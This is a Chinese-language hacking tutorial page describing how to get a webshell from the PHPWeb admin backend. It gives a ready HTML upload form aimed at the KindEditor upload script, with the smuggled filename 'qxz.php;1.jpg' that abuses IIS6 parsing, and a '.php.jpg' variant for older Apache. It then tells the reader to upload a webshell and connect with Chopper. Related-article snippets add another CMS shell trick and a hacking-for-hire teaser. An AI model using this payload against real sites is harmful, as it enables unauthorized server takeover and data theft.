phpweb后台拿shell简单 ***
关于phpweb后台拿shell简单 *** 。
首先登录后台admin.php
登录后台管理系统后,然后把下面的文件保存为xxx.html,修改action,把 www.xxx.com 改成你的目标网站地址。
代码文件如下:
<form name=”uploadForm” method=”post” enctype=”multipart/form-data” action=”http://www.xxx.com/kedit/upload_cgi/upload.php”>
<input type=”text” name=”fileName” value=”qxz.php;1.jpg” />
<input type=”hidden” name=”attachPath” value=”news/pics/” />
<input type=”file” name=”fileData” size=”14″ /></td>
<input type=”submit” name=”button” value=”确定” />
</form>
<input type=”text” name=”fileName” value=”qxz.php;1.jpg” />
<input type=”hidden” name=”attachPath” value=”news/pics/” />
<input type=”file” name=”fileData” size=”14″ /></td>
<input type=”submit” name=”button” value=”确定” />
</form>
然后选择你的马儿再上传
上传后如果为iis6,就点击查看源码就可以找到马儿的路径了。
菜刀链接看下
PS:qxz.php;1.jpg这样的文件是允许上传的,只要服务器是IIS6就拿到webshell,低版本的apache可以试着重命名为qxz.php.jpg
代码文件下载地址:http://pan.baidu.com/s/1eRzHs
相关文章
AppScan免费下载、安装、使用方法
AppScan是一个Web漏洞检测程序流程,关键适用Windows系统软件。 一、AppScan破解下载详细地址 百度搜索网盘分享:https://pan.baidu.com/s/1y...
Nessus 5.0 使用指南
参考官方手册 http://static.tenable.com/documentation/nessus_5.0_user_guide.pdf Nessus是世界上最流行的...
最经典的黑客入门教程
第一节、黑客的种类和行为 以我的理解,“黑客”大体上应该分为“正”、“邪”两类,正派黑客依靠自己掌握的知识帮助系统管理员找出系统中的漏洞并加以完善,而邪派黑客则是通过各种黑客技能对系统进行攻击、入...
帝国cms后台拿shell两种方法
第一种方法: 增加自定义页面 (6.0上实验成功) 模板管理–>增加自定义页面–>页面名称随便–>文件名:x.asp;.html–>页面内容–>小马...
黑客技术怎么找(黑客入侵接单)
技术怎么怎么找黑客 1、黑客全球冠军。技术怎么入侵接单Break,但是星夜点黑客接单芒之中。Eric。寻找黑客其它就简便了,除非你的手机连着电脑。将不对任何资源负法律责任,很容权易中病毒,d。技术怎么...
Netsparker在“Web程序运行安全性扫描仪程序流程”
什么叫Netsparker? Netsparker在“Web程序运行安全性扫描仪程序流程”的黑客工具类型中标识,该类型致力于发觉和审批Web引入和跨站脚本制作(XSS)概率等Web程序运行系统漏洞。...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!